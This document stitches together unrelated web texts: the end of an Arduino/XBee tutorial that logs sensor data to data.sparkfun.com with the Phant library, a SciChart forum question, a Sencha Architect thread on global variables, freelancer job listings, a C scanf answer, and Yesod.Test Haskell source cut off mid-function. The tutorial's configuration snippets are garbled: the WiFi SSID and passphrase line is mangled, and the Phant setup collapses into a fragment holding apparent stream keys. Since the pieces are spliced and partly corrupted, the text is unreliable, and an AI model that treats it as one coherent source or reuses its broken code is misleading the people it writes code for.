if (millis() > (lastUpdate + UPDATE_RATE)) { Serial.print("Sending update..."); if (sendData()) Serial.println("SUCCESS!"); else Serial.println("Failed :("); lastUpdate = millis(); } // In the meanwhile, we'll print data to the serial monitor, // just to let the world know our Arduino is still operational: readSensors(); // Get updated values from sensors Serial.print(millis()); // Timestamp Serial.print(": "); Serial.print(lightVal); Serial.print('\t'); Serial.print(tempVal); Serial.print('\t'); Serial.print(coVal); Serial.print('\t'); Serial.println(methaneVal); delay(1000); } //////////////// // sendData() // //////////////// // sendData() makes use of the PHANT LIBRARY to send data to the // data.sparkfun.com server. We'll use phant.add() to add specific // parameter and their values to the param list. Then use // phant.post() to send that data up to the server. int sendData() { xB.flush(); // Flush data so we get fresh stuff in // IMPORTANT PHANT STUFF!!! // First we need to add fields and values to send as parameters // Since we just need to read values from the analog pins, this // can be automized with a for loop: readSensors(); // Get updated values from sensors. phant.add(tempField, tempVal); phant.add(lightField, lightVal); phant.add(methaneField, methaneVal); phant.add(coField, coVal); // After our PHANT.ADD's we need to PHANT.POST(). The post needs // to be sent out the XBee. A simple "print" of that post will // take care of it. xB.print(phant.post()); // Check the response to make sure we receive a "200 OK". If // we were good little programmers we'd check the content of // the OK response. If we were good little programmers... 
char response[12]; if (waitForAvailable(12) > 0) { for (int i=0; i<12; i++) { response[i] = xB.read(); } if (memcmp(response, "HTTP/1.1 200", 12) == 0) return 1; else { Serial.println(response); return 0; // Non-200 response } } else // Otherwise timeout, no response from server return -1; } // readSensors() will simply update a handful of global variables // It updates tempVal, lightVal, coVal, and methaneVal void readSensors() { tempVal = ((analogRead(tempPin)*opVoltage/1024.0)-0.5)*100; tempVal = (tempVal * 9.0/5.0) + 32.0; // Convert to farenheit lightVal = analogRead(lightPin); methaneVal = analogRead(methanePin); coVal = analogRead(coPin); } /////////////////////////// // XBee WiFi Setup Stuff // /////////////////////////// // setupHTTP() sets three important parameters on the XBee: // 1. Destination IP -- This is the IP address of the server // we want to send data to. // 2. Destination Port -- We'll be sending data over port 80. // The standard HTTP port a server listens to. // 3. IP protocol -- We'll be using TCP (instead of default UDP). void setupHTTP(String address) { // Enter command mode, wait till we get there. while (!commandMode(1)) ; // Set IP (1 - TCP) command("ATIP1", 2); // RESP: OK // Set DL (destination IP address) command("ATDL" + address, 2); // RESP: OK // Set DE (0x50 - port 80) command("ATDE50", 2); // RESP: OK commandMode(0); // Exit command mode when done } /////////////// // printIP() // /////////////// // Simple function that enters command mode, reads the IP and // prints it to a serial terminal. Then exits command mode. void printIP() { // Wait till we get into command Mode. while (!commandMode(1)) ; // Get rid of any data that may have already been in the // serial receive buffer: xB.flush(); // Send the ATMY command. Should at least respond with // "0.0.0.0\r" (7 characters): command("ATMY", 7); // While there are characters to be read, read them and throw // them out to the serial monitor. 
while (xB.available() > 0) { Serial.write(xB.read()); } // Exit command mode: commandMode(0); } ////////////////////////////// // connectWiFi(id, ee, psk) // ////////////////////////////// // For all of your connecting-to-WiFi-networks needs, we present // the connectWiFi() function. Supply it an SSID, encryption // setting, and passphrase, and it'll try its darndest to connect // to your network. int connectWiFi(String id, byte auth, String psk) { const String CMD_SSID = "ATID"; const String CMD_ENC = "ATEE"; const String CMD_PSK = "ATPK"; // Check if we're connected. If so, sweet! We're done. // Otherwise, time to configure some settings, and print // some status messages: int status; while ((status = checkConnect(id)) != 0) { // Print a status message. If `status` isn't 0 (indicating // "connected"), then it'll be one of these // (from XBee WiFI user's manual): // 0x01 - WiFi transceiver initialization in progress. // 0x02 - WiFi transceiver initialized, but not yet scanning // for access point. // 0x13 - Disconnecting from access point. // 0x23 – SSID not configured. // 0x24 - Encryption key invalid (either NULL or invalid // length for WEP) // 0x27 – SSID was found, but join failed. 0x40- Waiting for // WPA or WPA2 Authentication // 0x41 – Module joined a network and is waiting for IP // configuration to complete, which usually means it is // waiting for a DHCP provided address. // 0x42 – Module is joined, IP is configured, and listening // sockets are being set up. // 0xFF– Module is currently scanning for the configured SSID. // // We added 0xFE to indicate connected but SSID doesn't match // the provided id. 
Serial.print("Waiting to connect: "); Serial.println(status, HEX); commandMode(1); // Enter command mode // Write AH (2 - Infrastructure) -- Locked in command("ATAH2", 2); // Write CE (2 - STA) -- Locked in command("ATCE2", 2); // Write ID (SparkFun) -- Defined as parameter command(CMD_SSID + id, 2); // Write EE (Encryption Enable) -- Defined as parameter command(CMD_ENC + auth, 2); // Write PK ("sparkfun6175") -- Defined as parameter command(CMD_PSK + psk, 2); // Write MA (0 - DHCP) -- Locked in command("ATMA0", 2); // Write IP (1 - TCP) -- Loced in command("ATIP1", 2); commandMode(0); // Exit Command Mode CN delay(2000); } } // Check if the XBee is connected to a WiFi network. // This function will send the ATAI command to the XBee. // That command will return with either a 0 (meaning connected) // or various values indicating different levels of no-connect. byte checkConnect(String id) { char temp[2]; commandMode(0); while (!commandMode(1)) ; command("ATAI", 2); temp[0] = hexToInt(xB.read()); temp[1] = hexToInt(xB.read()); xB.flush(); if (temp[0] == 0) { command("ATID", 1); int i=0; char c=0; String atid; while ((c != 0x0D) && xB.available()) { c = xB.read(); if (c != 0x0D) atid += c; } if (atid == id) return 0; else return 0xFE; } else { if (temp[1] == 0x13) return temp[0]; else return (temp[0]<<4) | temp[1]; } } ///////////////////////////////////// // Low-level, ugly, XBee Functions // ///////////////////////////////////// void command(String atcmd, int rsplen) { xB.flush(); xB.print(atcmd); xB.print("\r"); waitForAvailable(rsplen); } int commandMode(boolean enter) { xB.flush(); if (enter) { char c; xB.print("+++"); // Send CMD mode string waitForAvailable(1); if (xB.available() > 0) { c = xB.read(); if (c == 'O') // That's the letter 'O', assume 'K' is next return 1; // IF we see "OK" return success } return 0; // If no (or incorrect) receive, return fail } else { command("ATCN", 2); return 1; } } int waitForAvailable(int qty) { int timeout = 
COMMAND_TIMEOUT; while ((timeout-- > 0) && (xB.available() < qty)) delay(1); return timeout; } byte hexToInt(char c) { if (c >= 0x41) // If it's A-F return c - 0x37; else return c - 0x30; } Wait! Before you get on with uploading that code to your Arduino, there are a few variable constants you'll need to modify. Define Your WiFi Network The example code does its best to set up the XBee WiFi with your WiFi network's unique settings. Under the "WiFi Network Stuff" section, you'll need to fill in your WiFi's SSID, encryption mode, and passkey (if applicable). language:c //////////////////////// // WiFi Network Stuff // //////////////////////// // Your WiFi network's SSID (name): String WIFI_SSID = "network = "network_passphrase_here"; For the encryption setting, we've created an enumerated type, which will corral that variable into one of four possible values: open (no passphrase), WPA TKIP, WPA2 AES, or WEP. Set Up Phant Stuff All of the keys and fields you defined during the stream creation process come into play next. Follow the directions in the comments to add your data stream's public key, private key, and data fields. language:c ///////////////// //","5Jzx1x8Epgfld3GVzdpo","7BdxZxyVj6Flq5Wn6qVM"); // Phant field string defintions. Make sure these match the // fields you've defined in your data stream: const String methaneField = "methane"; const String coField = "co"; const String tempField = "temp"; const String lightField = "light"; Unless you're using a server of your own (good on you!), leave the destIP and "data.sparkfun.com" values alone. That random IP address ( 54.86.132.254) DNS's to data.sparkfun.com. In this section we're creating an instance of the Phant class called phant, which we'll reference later on in the sketch. Check out the library's Readme file for more explanation of the Phant library. Set Up XBee WiFi Stuff The next section sets up communication with the XBee. 
If you're using the shield (or the setup from the "Hardware Hookup" page), and your XBee is set to a default baud rate, you can most likely leave this section alone.

language:c
////////////////
// XBee Stuff //
////////////////
const byte XB_RX = 2; // XBee's RX (Din) pin
const byte XB_TX = 3; // XBee's TX (Dout) pin
const int XBEE_BAUD = 9600; // Your XBee's baud rate

If you've customized the pin connections, adjust the XB_RX and XB_TX variables accordingly. Same goes for the XBEE_BAUD variable, if you've modified your XBee's baud rate.

Setting the Update Rate

The code is configured to send an updated log just about every 5 minutes. You can turn the update speed up or down by adjusting the UPDATE_RATE variable. This value is defined in milliseconds, so it'll take a bit of math to convert from a desired minute-ish rate.

language:c
/////////////////////////
// Update Rate Control //
/////////////////////////
// Phant limits you to 10 seconds between posts. Use this variable
// to limit the update rate (in milliseconds):
const unsigned long UPDATE_RATE = 300000; // 300000ms = 5 minutes

SparkFun's Phant service limits you to one update every 10 seconds, so don't drop the update rate below 10000.

Upload the Code and Test

Once you've made those adjustments, you can safely upload the code. After you've sent the sketch to your Arduino, open up the Serial Monitor to get an idea of what's going on.

If your XBee isn't already connected to a network, it may take a few moments to get the handshakes and DHCP arranged with the router. A few Waiting to connect: XX messages may flow by every couple of seconds indicating the various phases of connecting. (If you're curious, the meaning of those "XX" values is explained in the connectWiFi function.)

Once the XBee is connected, we'll attempt to post our first log of data. You should see a Sending Update... message, followed quickly by SUCCESS!. If you got a success message, go refresh your public stream URL! If your message fails to log, an error message will be printed -- in that case double-check that everything is defined correctly (these things are case-sensitive).
In addition to posting to the web, the sensor readings will begin to stream in the serial monitor...it gives the Arduino something to do in between updates.

Using the Phant Library

The real meat of the server-logging action occurs in the sendData() function. This function achieves two goals: it reads the sensor values, then packages those up into a Phant update to send to our server.

The real key to using the Phant library is the phant.add([field], [value]) function. Since we have four fields to update, we need to make four unique calls of this function to set our four values:

language:c
phant.add(tempField, tempVal);       // Write the temperature field ("temp") and its value
phant.add(lightField, lightVal);     // Write the light field ("light") and its value
phant.add(methaneField, methaneVal); // Write the methane field ("methane") and its value
phant.add(coField, coVal);           // Write the carbon-monoxide field ("co") and its value

If you have more or fewer data fields in your stream, you'll need to adjust those four lines accordingly.

Once we've made our phant.add()'s, the last step is to send the data off to the server. In this case we combine a software serial print (to send data to the XBee) with the phant.post() function.

language:c
// After our PHANT.ADD's we need to PHANT.POST(). The post needs
// to be sent out the XBee. A simple "print" of that post will
// take care of it.
xB.print(phant.post());

That's all there is to it. The XBee will route that post out to the server it's connected to, and your Arduino can get on with reading sensors or constructing a new post.

Resources and Going Further

Mmmm data. But once you've logged your data to the Internet, what's next? Here are some ideas.

Using the Data

Once you have the data stream running, you have a few tools to view and manipulate the data. You can download it as either a CSV or JSON, by clicking the links at the top of the page. Then you can import those files into a spreadsheet or one of many online plotting services.
We're big fans of Plot.ly, which you can use to generate beautiful graphs, like this: Add Your Own Sensors! Unfortunately, the least flexible part of the example code is the most wide-open, fun part: customizing it with your own sensors. To update sensor readings, we defined a function -- readSensors() -- which reads our sensors and updates a global variable to store each value. Feel free to plug your own machinations into that function, customize the variables, or even add more! If you're adding or removing sensors, don't forget to modify the Phant fields, and add or remove Phant.add() function calls to get your data into the HTTP POST. For example, I wanted to increase the reliability of my logger's data, so I replaced the analog light and temperature sensors with digital options -- the TSL2561 luminosity sensor and an HTU21D Humidity/Temperature sensor. That meant adding a pair of Arduino libraries to read from those sensors, and modifying the code a bit. If you want to check out my advanced example, click here to download the sketch. You can see how I modified the code to add a fifth data field (humidity), and incorporated more complex sensor data gathering for the digital sensors. There are a plethora of sensors out there, what are you going to log? Weather is always a popular option; perhaps you can turn out a version of our wireless weather station data logger, which uses an Electric Imp instead of Arduino/XBee. Or how about making the project wearable with a LilyPad XBee? That's where I'm headed next. This tutorial is only the start, we can't wait to see what you do with data.sparkfun.com!
SciChart® the market leader in Fast WPF Charts, WPF 3D Charts, iOS Chart, Android Chart and JavaScript Chart Components

Hi guys,

I have two SciCharts, and a different custom modifier on each of them. I have utilised the Mouse:MouseManager.MouseEventGroup="MySharedMouseGroup" logic to share mouse events between the two charts. The problem is, I would like Chart A to handle its own MouseMove events and share those with Chart B, but Chart B should handle its own MouseMove events (and those sent from Chart A, obviously) without sending anything back to Chart A's modifiers.

I have noticed that there are some base properties from UIElement called "IsMouseOver" which should let me handle this (i.e. in Chart B's OnModifierMouseMove method it could check IsMouseOver and, if false, simply return. That way, the message is still being shared between A and B, but B just ignores A's messages). Unfortunately, I find this IsMouseOver property to always be false, no matter where the pointer is.

How would you guys recommend I tackle this problem?

As an example of the problem, let's say you have two SciCharts, each with their own RolloverModifier, and their ModifierGroup shares a MouseEventGroup "MySharedMouseGroup". You want one chart to display a rollover on both surfaces when the mouse moves over it, but the other to display a rollover on just its own surface when the mouse is over it.

Cheers,
Miles

Hi Miles,

I have an idea for you! There is a property in the ModifierMouseArgs called IsMaster. When this is true, the modifier triggered the event; otherwise it is receiving the event from another modifier.
To make use of this, try the following: // Note: not compiled this, but it demonstrates the principle public class IgnoresSlaveEventsRolloverModifier : RolloverModifier { public override void OnModifierMouseMove(ModifierMouseArgs e) { if (e.IsMaster) { base.OnModifierMouseMove(e); } } } Now register the IgnoresSlaveEventsRolloverModifier on your first chart and use a normal RolloverModifier on the second chart. Mouse over the first chart and both should receive the event, but mouse over the second and only the second should receive the event.
Global Variables

I'm having a heck of a time trying to set a global variable and reference it from within a controller. Has anyone done this with Architect? I saw a mention of creating a custom class and doing it that way, but I can't seem to reference it correctly in Architect. I tried adding it as a controller (MyApp.controller.Utils), but then I can't see how you "require" it in the Application itself. Any help would be appreciated. Thanks.

The whole point is to avoid cluttering the global JavaScript namespace. Are you trying to set/get an external variable (from another JavaScript library, for example) or are you trying to have your own global variables? The few global variables I have in my projects I add to an object with the same name as the project, for example VPCalcTouch.config, and then add properties to that one. Easy to access and debug. I also use this to load up the defaults from the server by inserting a JS snippet in the app.html file.
HtH, /Mattias

I'm all for keeping everything clean. This would be an environment variable (dev, staging, qa, production) that would be passed into the application on initial load. From there, the app knows which server to get data from. I'm just trying to set this variable so my service calls connect to the correct server. We're not using Sencha Cmd, so I'm trying to set this on app load.

Just adding the variables to your app's namespace would make them accessible everywhere in your project and keep the global namespace clean. Set them initially in the Application.init() function to make sure they are available to all components in the application before they start to run their own init().

OK, I guess this is where I'm unsure how to do this from within Sencha Architect. In the panel there is no "init" function...there is a launch and Loader Config. I can create an "init" function in the "functions" section, or is there an override needed of "init"?
I tried setting MyApp.app.config.environment = "dev"; within the "launch" function and referencing that variable from my controller, but that did not work. I also tried doing MyApp.config.environment = "dev"; which also failed. Thanks.

You should add a function init to the Application object at the top of the Project Inspector (see the screencast). The code in init() should be along these lines (remember to create the property "config" before assigning parameters, and also remember not to redefine your app's namespace):

Code:
VPCalcDesktop.config = VPCalcDesktop.config || {};
VPCalcDesktop.config.eff_olja = 92.0;
VPCalcDesktop.config.eff_ved = 75.0;
VPCalcDesktop.config.eff_flis = 90.0;
VPCalcDesktop.config.eff_pellets = 85.0;
VPCalcDesktop.config.eff_fjarrv = 100.0;
VPCalcDesktop.config.eff_el = 100.0;

HtH, /Mattias

Ah, that got it...thanks for the screencast. Thanks for all the help with this. I've been trying for 6 hours adding and removing variables trying to figure this all out.

Yeah, there's more than one way to code in JavaScript. I agree that Mitchell's way in his post is a nice one, and the trick in Sencha Architect to configure this is to click on the menu item "Class >" in the + menu in the Project Inspector - this generates a clean class (works also with Stores, btw). Add the properties in the Config panel or in code. Another trick is that you need to type the name in as a require on the Application node in Project Inspector - the interface for configuring models, stores, views or controllers (with drop-down menus) doesn't work for defined classes for some reason. However, in my apps I have configuration coming from the server via app.html, and getting that data into a class à la Mitchell would be challenging. Anyway, glad to hear you are on your way to the next challenge in your project.

Happy Coding!
/Mattias - I love being a dad (5 & 7), flying airplanes (KBED) and writing code (spaghetti).
BostonMerlin aka John Bond aka JB
See U @ SenchaCon '13

OK, one last question...how is everyone getting this information into their app initially? For the environment, I can just use the host name where the app is being served from, but what if I needed to pass in extra params to the app? When we had this written in Flex, I liked setting these items on the page, then having the app read the params via scripting. Any suggestions for this? Thanks all.
Wpf project data access layer jobs

- The details of the project can be found in the attached PDF.
- have coding for player in java. I want the player as exe for desktop ..
- a couple of slider photos resized so they look properly in LayerSlider WordPress.
- I need an algorithm to create a custom ruler (vertical (left + right), horizontal) and show it. From a .cs file at run time the following information will be passed: [log in to see the URL] of main divisions, [log in to see the URL] of small divisions (usually 10, but it can be different), [log in to see the URL] step for main divisions ...
- The secret key generation in physical layer security achievement through reinforcement learning algorithms.
- [log in to see the URL] as a main skill (namespaces, access modifiers). -Basic knowledge of git, including branching and merging. -MVVM experience. -Portfolio with projects with similar requirements as expected by us. About Hiroku Hir...
- items in a gridview
- WPF and .NET expert needed: we need to update the layout of our C++ software and remake it in WPF. Need only the designed forms. See our new layout on Adobe XD: [log in to see the URL]
- I am looking for a lawyer in India. Only bid if you are in India; the closer to Dahej bypass road, Bharuch, the better. Please have experience working with Freelancer in India on disputes.
- [log in to see the URL] enabled. I found some similar issues ([log in to see the URL]; no drop with the basic GongSolutions sample; drag and drop forbidden on a panel even though AllowDrop is set to true) but no answer.
- I need a WPF app that should: 1- be able to play video from a URL (list of 3 URLs with videos, example: "[log in to see the URL][log in to see the URL]")
- I'm a geophysics researcher and need an instrument to show my results. I have folders with GeoTIFFs, and need a Python module to visualize 3 layers of geo data.
I would like to use scanf() to read input like this:

Q 1 3
U 2 6
Q 2 5
U 4 8

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int *a;
    int i, j;

    a = (int *) malloc(4 * 3 * sizeof(int));
    printf("input:\n");
    for (i = 0; i < 4; i++) {
        for (j = 0; j < 3; j++) {
            scanf("%d", a + 3 * i + j);
        }
    }
    printf("output:\n");
    for (i = 0; i < 4; i++) {
        for (j = 0; j < 3; j++) {
            printf("%d ", a[3*i+j]);
        }
        printf("\n");
    }
    return 0;
}

This happens because you provided non-numeric input (the Q in "Q 1 3") to a program that wants to read a number with %d. Since Q is not a number, scanf fails. However, your program is not paying attention to the return value of scanf, and keeps calling it in the failed state. The program thinks it is getting data, while in fact it is not.

To fix this, change the code to use %c or %s when it reads the non-numeric character, check the return value of scanf, and discard invalid input when scanf fails. When you call scanf, it returns how many values corresponding to % specifiers it has assigned. Here is how to check the return value of scanf:

if (scanf("%d", a + 3 * i + j) == 1) {
    ... // The input is valid
} else {
    scanf("%*[^\n]"); // Ignore to end of line
}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE PackageImports #-}
{-|
Yesod.Test is a pragmatic framework for testing web applications built
using wai and persistent.

By pragmatic I may also mean 'dirty'. Its main goal is to encourage integration
and system testing of web applications by making everything /easy to test/.

Your tests are like browser sessions that keep track of cookies and the last
visited page. You can perform assertions on the content of HTML responses,
using css selectors to explore the document more easily.

You can also easily build requests using forms present in the current page.
This is very useful for testing web applications built in yesod, for example,
where your forms may have field names generated by the framework or a randomly
generated '_nonce' field.

Your database is also directly available, so you can use runDB to set up
backend pre-conditions, or to assert that your session is having the desired
effect.
-}

module Yesod.Test (
  -- * Declaring and running your test suite
  runTests, describe, it, Specs, OneSpec,

  -- * Making requests
  -- | To make a request you need to point to a url and pass in some parameters.
  --
  -- To build your parameters you will use the RequestBuilder monad that lets you
  -- add values, add files, look up fields by label and find the current
  -- nonce value and add it to your request too.
  post, post_, get, get_, doRequest,
  byName, fileByName,

  -- | Yesod can auto-generate field ids, so you are never sure what
  -- the argument name should be for each one of your args when constructing
  -- your requests. What you do know is the /label/ of the field.
  -- These functions let you add parameters to your request based
  -- on currently displayed label names.
  byLabel, fileByLabel,

  -- | Does the current form have a _nonce? Use any of these to add it to your
  -- request parameters.
addNonce, addNonce_, -- * Running database queries runDB, -- * Assertions assertEqual, assertHeader, assertNoHeader, statusIs, bodyEquals, bodyContains, htmlAllContain, htmlCount, -- * Utils for debugging tests printBody, printMatches, -- * Utils for building your own assertions -- | Please consider generalizing and contributing the assertions you write. htmlQuery, parseHTML, withResponse ) where import qualified Test.Hspec.Core as Core import qualified Test.Hspec.Runner as Runner import qualified Data.List as DL import qualified Data.Maybe as DY import qualified Data.ByteString.Char8 as BS8 import qualified Data.Text as T import qualified Data.Text.Encoding as TE import qualified Data.ByteString.Lazy.Char8 as BSL8 import qualified Test.HUnit as HUnit import qualified Test.Hspec.HUnit () import qualified Network.HTTP.Types as H import qualified Network.Socket.Internal as Sock import Data.CaseInsensitive (CI) import Text.XML.HXT.Core hiding (app, err) import Network.Wai import Network.Wai.Test hiding (assertHeader, assertNoHeader) import qualified Control.Monad.Trans.State as ST import Control.Monad.IO.Class import System.IO import Yesod.Test.TransversingCSS import Database.Persist.GenericSql import Data.Monoid (mappend) import qualified Data.Text.Lazy as TL import Data.Text.Lazy.Encoding (encodeUtf8, decodeUtf8) -- | The state used in 'describe' to build a list of specs data SpecsData = SpecsData Application ConnectionPool [Core.Spec Core.AnyExample] -- | The specs state monad is where 'describe' runs. type Specs = ST.StateT SpecsData IO () -- | The state used in a single test case defined using 'it' data OneSpecData = OneSpecData Application ConnectionPool CookieValue (Maybe SResponse) -- | The OneSpec state monad is where 'it' runs. type OneSpec = ST.StateT OneSpecData IO data RequestBuilderData = RequestBuilderData [RequestPart] (Maybe SResponse) -- | Request parts let us discern regular key/values from files sent in the request. 
data RequestPart
  = ReqPlainPart String String
  | ReqFilePart String FilePath BSL8.ByteString String

-- | The RequestBuilder state monad constructs a url-encoded string of arguments
-- to send with your requests. Some of the functions that run on it use the current
-- response to analyze the forms that the server is expecting to receive.
type RequestBuilder = ST.StateT RequestBuilderData IO

-- | Both the OneSpec and RequestBuilder monads hold a response that can be analyzed;
-- by making them instances of this class we can have general methods that work on
-- the last received response.
class HoldsResponse a where
  readResponse :: a -> Maybe SResponse
instance HoldsResponse OneSpecData where
  readResponse (OneSpecData _ _ _ x) = x
instance HoldsResponse RequestBuilderData where
  readResponse (RequestBuilderData _ x) = x

type CookieValue = H.Ascii

-- | Runs your test suite, using your wai 'Application' and 'ConnectionPool' for
-- performing the database queries in your tests.
--
-- Your application may already have its own connection pool, but you need to pass
-- another one separately here.
--
-- Look at the examples directory of this package to get an idea of the (small)
-- amount of boilerplate code you'll need to write before calling this.
runTests :: Application -> ConnectionPool -> Specs -> IO a
runTests app connection specsDef = do
  (SpecsData _ _ specs) <- ST.execStateT specsDef (SpecsData app connection [])
  Runner.hspecX specs

-- | Start describing a test suite, keeping cookies and a reference to the tested
-- 'Application' and 'ConnectionPool'.
describe :: String -> Specs -> Specs
describe label action = do
  sData <- ST.get
  SpecsData app conn specs <- liftIO $ ST.execStateT action sData
  ST.put $ SpecsData app conn [Core.describe label specs]

-- | Describe a single test that keeps cookies, and a reference to the last response.
it :: String -> OneSpec () -> Specs it label action = do SpecsData app conn specs <- ST.get let spec = Core.it label $ do _ <- ST.execStateT action $ OneSpecData app conn "" Nothing return () ST.put $ SpecsData app conn $ spec : specs -- Performs a given action using the last response. Use this to create -- response-level assertions withResponse :: HoldsResponse a => (SResponse -> ST.StateT a IO b) -> ST.StateT a IO b withResponse f = maybe err f =<< fmap readResponse ST.get where err = failure "There was no response, you should make a request" -- | Use HXT to parse a value from an html tag. -- Check for usage examples in this module's source. parseHTML :: Html -> LA XmlTree a -> [a] parseHTML html p = runLA (hread >>> p ) (TL.unpack $ decodeUtf8 html) -- | Query the last response using css selectors, returns a list of matched fragments htmlQuery :: HoldsResponse a => Query -> ST.StateT a IO [Html] htmlQuery query = withResponse $ \ res -> case findBySelector (simpleBody res) query of Left err -> failure $ T.unpack query ++ " did not parse: " ++ (show err) Right matches -> return $ map (encodeUtf8 . TL.pack) matches -- | Asserts that the two given values are equal. assertEqual :: (Eq a) => String -> a -> a -> OneSpec () assertEqual msg a b = liftIO $ HUnit.assertBool msg (a == b) -- | Assert the last response status is as expected. statusIs :: HoldsResponse a => Int -> ST.StateT a IO () statusIs number = withResponse $ \ SResponse { simpleStatus = s } -> liftIO $ flip HUnit.assertBool (H.statusCode s == number) $ concat [ "Expected status was ", show number , " but received status was ", show $ H.statusCode s ] -- | Assert the given header key/value pair was returned. 
assertHeader :: HoldsResponse a => CI BS8.ByteString -> BS8.ByteString -> ST.StateT a IO () assertHeader header value = withResponse $ \ SResponse { simpleHeaders = h } -> case lookup header h of Nothing -> failure $ concat [ "Expected header " , show header , " to be " , show value , ", but it was not present" ] Just value' -> liftIO $ flip HUnit.assertBool (value == value') $ concat [ "Expected header " , show header , " to be " , show value , ", but received " , show value' ] -- | Assert the given header was not included in the response. assertNoHeader :: HoldsResponse a => CI BS8.ByteString -> ST.StateT a IO () assertNoHeader header = withResponse $ \ SResponse { simpleHeaders = h } -> case lookup header h of Nothing -> return () Just s -> failure $ concat [ "Unexpected header " , show header , " containing " , show s ] -- | Assert the last response is exactly equal to the given text. This is -- useful for testing API responses. bodyEquals :: HoldsResponse a => String -> ST.StateT a IO () bodyEquals text = withResponse $ \ res -> liftIO $ HUnit.assertBool ("Expected body to equal " ++ text) $ (simpleBody res) == BSL8.pack text -- | Assert the last response has the given text. The check is performed using the response -- body in full text form. bodyContains :: HoldsResponse a => String -> ST.StateT a IO () bodyContains text = withResponse $ \ res -> liftIO $ HUnit.assertBool ("Expected body to contain " ++ text) $ (simpleBody res) `contains` text contains :: BSL8.ByteString -> String -> Bool contains a b = DL.isInfixOf b (BSL8.unpack a) -- | Queries the html using a css selector, and all matched elements must contain -- the given string. 
htmlAllContain :: HoldsResponse a => Query -> String -> ST.StateT a IO () htmlAllContain query search = do matches <- htmlQuery query case matches of [] -> failure $ "Nothing matched css query: "++T.unpack query _ -> liftIO $ HUnit.assertBool ("Not all "++T.unpack query++" contain "++search) $ DL.all (DL.isInfixOf search) (map (TL.unpack . decodeUtf8) matches) -- | Performs a css query on the last response and asserts the matched elements -- are as many as expected. htmlCount :: HoldsResponse a => Query -> Int -> ST.StateT a IO () htmlCount query count = do matches <- fmap DL.length $ htmlQuery query liftIO $ flip HUnit.assertBool (matches == count) ("Expected "++(show count)++" elements to match "++T.unpack query++", found "++(show matches)) -- | Outputs the last response body to stderr (So it doesn't get captured by HSpec) printBody :: HoldsResponse a => ST.StateT a IO () printBody = withResponse $ \ SResponse { simpleBody = b } -> liftIO $ hPutStrLn stderr $ BSL8.unpack b -- | Performs a CSS query and print the matches to stderr. printMatches :: HoldsResponse a => Query -> ST.StateT a IO () printMatches query = do matches <- htmlQuery query liftIO $ hPutStrLn stderr $ show matches -- | Add a parameter with the given name and value. byName :: String -> String -> RequestBuilder () byName name value = do RequestBuilderData parts r <- ST.get ST.put $ RequestBuilderData ((ReqPlainPart name value):parts) r -- | Add a file to be posted with the current request -- -- Adding a file will automatically change your request content-type to be multipart/form-data fileByName :: String -> FilePath -> String -> RequestBuilder () fileByName name path mimetype = do RequestBuilderData parts r <- ST.get contents <- liftIO $ BSL8.readFile path ST.put $ RequestBuilderData ((ReqFilePart name path contents mimetype):parts) r -- This looks up the name of a field based on the contents of the label pointing to it. 
nameFromLabel :: String -> RequestBuilder String
nameFromLabel label = withResponse $ \ res -> do
  let body = simpleBody res
      escaped = escapeHtmlEntities label
      mfor = parseHTML body $ deep $
               hasName "label"
               >>> filterA (xshow this >>> mkText >>> hasText (DL.isInfixOf escaped))
               >>> getAttrValue "for"
  case mfor of
    for:[] -> do
      let mname = parseHTML body $ deep $
                    hasAttrValue "id" (==for) >>> getAttrValue "name"
      case mname of
        "":_ -> failure $ "Label "++label++" resolved to id "++for++" which was not found. "
        name:_ -> return name
        _ -> failure $ "More than one input with id " ++ for
    [] -> failure $ "No label contained: "++label
    _ -> failure $ "More than one label contained "++label

-- | Escape HTML entities in a string, so you can write the text you want in
-- label lookups without worrying about the fact that yesod escapes some characters.
escapeHtmlEntities :: String -> String
escapeHtmlEntities "" = ""
escapeHtmlEntities (c:cs) = case c of
  '<'  -> '&' : 'l' : 't' : ';' : escapeHtmlEntities cs
  '>'  -> '&' : 'g' : 't' : ';' : escapeHtmlEntities cs
  '&'  -> '&' : 'a' : 'm' : 'p' : ';' : escapeHtmlEntities cs
  '"'  -> '&' : 'q' : 'u' : 'o' : 't' : ';' : escapeHtmlEntities cs
  '\'' -> '&' : '#' : '3' : '9' : ';' : escapeHtmlEntities cs
  x    -> x : escapeHtmlEntities cs

byLabel :: String -> String -> RequestBuilder ()
byLabel label value = do
  name <- nameFromLabel label
  byName name value

fileByLabel :: String -> FilePath -> String -> RequestBuilder ()
fileByLabel label path mime = do
  name <- nameFromLabel label
  fileByName name path mime

-- | Lookup a _nonce form field and add its value to the params.
-- Receives a CSS selector that should resolve to the form element containing the nonce.
addNonce_ :: Query -> RequestBuilder ()
addNonce_ scope = do
  matches <- htmlQuery $ scope `mappend` "input[name=_token][type=hidden][value]"
  case matches of
    [] -> failure $ "No nonce found in the current page"
    element:[] -> byName "_token" $ head $ parseHTML element $ getAttrValue "value"
    _ -> failure $ "More than one nonce found in the page"

-- | For responses that display a single form, just lookup the only nonce available.
addNonce :: RequestBuilder ()
addNonce = addNonce_ ""

-- | Perform a POST request to url, using params
post :: BS8.ByteString -> RequestBuilder () -> OneSpec ()
post url paramsBuild = do
  doRequest "POST" url paramsBuild

-- | Perform a POST request without params
post_ :: BS8.ByteString -> OneSpec ()
post_ = flip post $ return ()

-- | Perform a GET request to url, using params
get :: BS8.ByteString -> RequestBuilder () -> OneSpec ()
get url paramsBuild = doRequest "GET" url paramsBuild

-- | Perform a GET request without params
get_ :: BS8.ByteString -> OneSpec ()
get_ = flip get $ return ()

-- | General interface to performing requests, letting you specify the request method and extra headers.
doRequest :: H.Method -> BS8.ByteString -> RequestBuilder a -> OneSpec ()
doRequest method url paramsBuild = do
  OneSpecData app conn cookie mRes <- ST.get
  RequestBuilderData parts _ <- liftIO $ ST.execStateT paramsBuild $ RequestBuilderData [] mRes
  let req = if DL.any isFile parts
              then makeMultipart cookie parts
              else makeSinglepart cookie parts
  response <- liftIO $ runSession (srequest req) app
  let cookie' = DY.fromMaybe cookie $ fmap snd $ DL.find (("Set-Cookie"==) . fst) $ simpleHeaders response
  ST.put $ OneSpecData app conn cookie' (Just response)
 where
  isFile (ReqFilePart _ _ _ _) = True
  isFile _ = False

  -- For building the multi-part requests
  boundary :: String
  boundary = "*******noneedtomakethisrandom"
  separator = BS8.concat ["--", BS8.pack boundary, "\r\n"]
  makeMultipart cookie parts =
    flip SRequest (BSL8.fromChunks [multiPartBody parts]) $ mkRequest
      [ ("Cookie", cookie)
      , ("Content-Type", BS8.pack $ "multipart/form-data; boundary=" ++ boundary)]
  multiPartBody parts =
